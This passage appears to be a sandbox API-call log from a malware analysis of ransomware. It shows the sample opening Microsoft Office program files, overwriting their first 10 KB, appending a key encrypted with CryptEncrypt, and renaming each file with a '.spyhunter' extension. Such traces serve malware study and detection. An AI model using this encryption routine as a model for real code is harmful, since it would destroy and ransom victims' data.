0x15c [0110.850] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\MEDCAT.DLL") returned 57 [0110.850] StrStrW (lpFirst="MEDCAT.DLL", lpSrch=".txt") returned 0x0 [0110.850] GetProcessHeap () returned 0x2c0000 [0110.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0110.850] ReadFile (in: hFile=0x15c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248faec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248faec*=0x2800, lpOverlapped=0x0) returned 1 [0110.883] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.883] WriteFile (in: hFile=0x15c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248faec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248faec*=0x2800, lpOverlapped=0x0) returned 1 [0110.884] GetProcessHeap () returned 0x2c0000 [0110.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0110.884] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.884] WriteFile (in: hFile=0x15c, lpBuffer=0x248fb2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248faec, lpOverlapped=0x0 | out: lpBuffer=0x248fb2c*, lpNumberOfBytesWritten=0x248faec*=0x4, lpOverlapped=0x0) returned 1 [0110.948] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248faec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248faec*=0x30, lpOverlapped=0x0) returned 1 [0110.948] CloseHandle (hObject=0x15c) returned 1 [0110.949] GetProcessHeap () returned 0x2c0000 [0110.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0110.949] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\MEDCAT.DLL.spyhunter") returned 67 [0110.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\MEDCAT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\medcat.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\MEDCAT.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\medcat.dll.spyhunter")) returned 1 [0110.950] GetProcessHeap () returned 0x2c0000 [0110.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0110.950] GetProcessHeap () returned 0x2c0000 [0110.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0110.950] GetProcessHeap () returned 0x2c0000 [0110.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dea750 | out: hHeap=0x2c0000) returned 1 [0110.950] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb30 | out: pbBuffer=0x248fb30) returned 1 [0110.950] GetProcessHeap () returned 0x2c0000 [0110.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0110.950] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb28*=0x30) returned 1 [0110.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnwd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0110.951] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnWD.dll") returned 59 [0110.951] StrStrW (lpFirst="ONBttnWD.dll", lpSrch=".txt") returned 0x0 [0110.951] GetProcessHeap () returned 0x2c0000 [0110.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0110.951] ReadFile (in: hFile=0x15c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248faec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248faec*=0x2800, lpOverlapped=0x0) returned 1 [0110.966] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.966] WriteFile (in: hFile=0x15c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248faec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248faec*=0x2800, lpOverlapped=0x0) returned 1 [0110.966] GetProcessHeap () returned 0x2c0000 [0110.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0110.966] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.966] WriteFile (in: hFile=0x15c, lpBuffer=0x248fb2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248faec, lpOverlapped=0x0 | out: lpBuffer=0x248fb2c*, lpNumberOfBytesWritten=0x248faec*=0x4, lpOverlapped=0x0) returned 1 [0110.981] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248faec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248faec*=0x30, lpOverlapped=0x0) returned 1 [0110.982] CloseHandle (hObject=0x15c) returned 1 [0110.982] GetProcessHeap () returned 0x2c0000 [0110.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0110.982] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnWD.dll.spyhunter") returned 69 [0110.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnwd.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ONBttnWD.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\onbttnwd.dll.spyhunter")) returned 1 [0110.982] GetProcessHeap () returned 0x2c0000 [0110.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0110.983] GetProcessHeap () returned 0x2c0000 [0110.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0110.983] GetProcessHeap () returned 0x2c0000 [0110.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2bf20 | out: hHeap=0x2c0000) returned 1 [0110.983] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb28 | out: pbBuffer=0x248fb28) returned 1 [0110.983] GetProcessHeap () returned 0x2c0000 [0110.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0110.983] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb20*=0x30) returned 1 [0110.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLOOK.EXE.MANIFEST" (normalized: "c:\\program files\\microsoft office\\office14\\outlook.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0110.983] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLOOK.EXE.MANIFEST") returned 67 [0110.983] StrStrW (lpFirst="OUTLOOK.EXE.MANIFEST", lpSrch=".txt") returned 0x0 [0110.983] GetProcessHeap () returned 0x2c0000 [0110.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0110.984] ReadFile (in: hFile=0x15c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fae4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fae4*=0x4b6, lpOverlapped=0x0) returned 1 [0110.997] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffb4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.998] WriteFile (in: hFile=0x15c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4b6, lpNumberOfBytesWritten=0x248fae4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fae4*=0x4b6, lpOverlapped=0x0) returned 1 [0110.998] GetProcessHeap () returned 0x2c0000 [0110.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0110.998] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.998] WriteFile (in: hFile=0x15c, lpBuffer=0x248fb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fae4, lpOverlapped=0x0 | out: lpBuffer=0x248fb24*, lpNumberOfBytesWritten=0x248fae4*=0x4, lpOverlapped=0x0) returned 1 [0110.998] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fae4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fae4*=0x30, lpOverlapped=0x0) returned 1 [0110.998] CloseHandle (hObject=0x15c) returned 1 [0110.998] GetProcessHeap () returned 0x2c0000 [0110.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0110.998] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLOOK.EXE.MANIFEST.spyhunter") returned 77 [0110.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLOOK.EXE.MANIFEST" (normalized: "c:\\program files\\microsoft office\\office14\\outlook.exe.manifest"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLOOK.EXE.MANIFEST.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlook.exe.manifest.spyhunter")) returned 1 [0110.999] GetProcessHeap () returned 0x2c0000 [0110.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0110.999] GetProcessHeap () returned 0x2c0000 [0110.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0110.999] GetProcessHeap () returned 0x2c0000 [0110.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0b50 | out: hHeap=0x2c0000) returned 1 [0110.999] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb28 | out: pbBuffer=0x248fb28) returned 1 [0110.999] GetProcessHeap () returned 0x2c0000 [0110.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0110.999] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb20*=0x30) returned 1 [0111.000] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.se.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0111.001] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML") returned 79 [0111.001] StrStrW (lpFirst="YAHOO.SE.XML", lpSrch=".txt") returned 0x0 [0111.001] GetProcessHeap () returned 0x2c0000 [0111.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0111.001] ReadFile (in: hFile=0x15c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fae4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fae4*=0x326, lpOverlapped=0x0) returned 1 [0111.024] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffcda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.024] WriteFile (in: hFile=0x15c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x248fae4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fae4*=0x326, lpOverlapped=0x0) returned 1 [0111.025] GetProcessHeap () returned 0x2c0000 [0111.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0111.025] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.025] WriteFile (in: hFile=0x15c, lpBuffer=0x248fb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fae4, lpOverlapped=0x0 | out: lpBuffer=0x248fb24*, lpNumberOfBytesWritten=0x248fae4*=0x4, lpOverlapped=0x0) returned 1 [0111.025] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fae4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fae4*=0x30, lpOverlapped=0x0) returned 1 [0111.025] CloseHandle (hObject=0x15c) returned 1 [0111.026] GetProcessHeap () returned 0x2c0000 [0111.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.026] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML.spyhunter") returned 89 [0111.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.se.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.se.xml.spyhunter")) returned 1 [0111.026] GetProcessHeap () returned 0x2c0000 [0111.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.026] GetProcessHeap () returned 0x2c0000 [0111.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0111.026] GetProcessHeap () returned 0x2c0000 [0111.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce98b0 | out: hHeap=0x2c0000) returned 1 [0111.027] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb20 | out: pbBuffer=0x248fb20) returned 1 [0111.027] GetProcessHeap () returned 0x2c0000 [0111.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0111.027] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb18*=0x30) returned 1 [0111.027] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLRPC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\outlrpc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0111.027] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLRPC.DLL") returned 58 [0111.027] StrStrW (lpFirst="OUTLRPC.DLL", lpSrch=".txt") returned 0x0 [0111.027] GetProcessHeap () returned 0x2c0000 [0111.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0111.028] ReadFile (in: hFile=0x15c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fadc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fadc*=0x2800, lpOverlapped=0x0) returned 1 [0111.339] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.339] WriteFile (in: hFile=0x15c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fadc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fadc*=0x2800, lpOverlapped=0x0) returned 1 [0111.339] GetProcessHeap () returned 0x2c0000 [0111.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0111.339] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.339] WriteFile (in: hFile=0x15c, lpBuffer=0x248fb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fadc, lpOverlapped=0x0 | out: lpBuffer=0x248fb1c*, lpNumberOfBytesWritten=0x248fadc*=0x4, lpOverlapped=0x0) returned 1 [0111.339] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fadc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fadc*=0x30, lpOverlapped=0x0) returned 1 [0111.339] CloseHandle (hObject=0x15c) returned 1 [0111.339] GetProcessHeap () returned 0x2c0000 [0111.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.340] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLRPC.DLL.spyhunter") returned 68 [0111.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLRPC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\outlrpc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLRPC.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlrpc.dll.spyhunter")) returned 1 [0111.340] GetProcessHeap () returned 0x2c0000 [0111.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.340] GetProcessHeap () returned 0x2c0000 [0111.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0111.340] GetProcessHeap () returned 0x2c0000 [0111.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2ea20 | out: hHeap=0x2c0000) returned 1 [0111.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb20 | out: pbBuffer=0x248fb20) returned 1 [0111.341] GetProcessHeap () returned 0x2c0000 [0111.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0111.341] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb18*=0x30) returned 1 [0111.341] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.hk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0111.344] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML") returned 79 [0111.344] StrStrW (lpFirst="YAHOO.HK.XML", lpSrch=".txt") returned 0x0 [0111.345] GetProcessHeap () returned 0x2c0000 [0111.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0111.345] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fadc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fadc*=0x326, lpOverlapped=0x0) returned 1 [0111.373] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffcda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.373] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x248fadc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fadc*=0x326, lpOverlapped=0x0) returned 1 [0111.374] GetProcessHeap () returned 0x2c0000 [0111.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0111.374] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.374] WriteFile (in: hFile=0xb4, lpBuffer=0x248fb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fadc, lpOverlapped=0x0 | out: lpBuffer=0x248fb1c*, lpNumberOfBytesWritten=0x248fadc*=0x4, lpOverlapped=0x0) returned 1 [0111.374] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fadc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fadc*=0x30, lpOverlapped=0x0) returned 1 [0111.374] CloseHandle (hObject=0xb4) returned 1 [0111.374] GetProcessHeap () returned 0x2c0000 [0111.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc7358 [0111.374] wnsprintfW (in: pszDest=0x2cc7358, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML.spyhunter") returned 89 [0111.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.hk.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.hk.xml.spyhunter")) returned 1 [0111.375] GetProcessHeap () returned 0x2c0000 [0111.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc7358 | out: hHeap=0x2c0000) returned 1 [0111.375] GetProcessHeap () returned 0x2c0000 [0111.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0111.375] GetProcessHeap () returned 0x2c0000 [0111.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce9340 | out: hHeap=0x2c0000) returned 1 [0111.375] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb18 | out: pbBuffer=0x248fb18) returned 1 [0111.375] GetProcessHeap () returned 0x2c0000 [0111.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0111.375] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb10*=0x30) returned 1 [0111.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJIMPT.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\projimpt.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0111.376] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJIMPT.EXE") returned 59 [0111.377] StrStrW (lpFirst="PROJIMPT.EXE", lpSrch=".txt") returned 0x0 [0111.377] GetProcessHeap () returned 0x2c0000 [0111.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0111.377] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fad4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fad4*=0x2800, lpOverlapped=0x0) returned 1 [0111.419] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.419] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fad4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fad4*=0x2800, lpOverlapped=0x0) returned 1 [0111.419] GetProcessHeap () returned 0x2c0000 [0111.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0111.419] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.419] WriteFile (in: hFile=0xb4, lpBuffer=0x248fb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fad4, lpOverlapped=0x0 | out: lpBuffer=0x248fb14*, lpNumberOfBytesWritten=0x248fad4*=0x4, lpOverlapped=0x0) returned 1 [0111.428] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fad4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fad4*=0x30, lpOverlapped=0x0) returned 1 [0111.428] CloseHandle (hObject=0xb4) returned 1 [0111.428] GetProcessHeap () returned 0x2c0000 [0111.428] RtlAllocateHeap 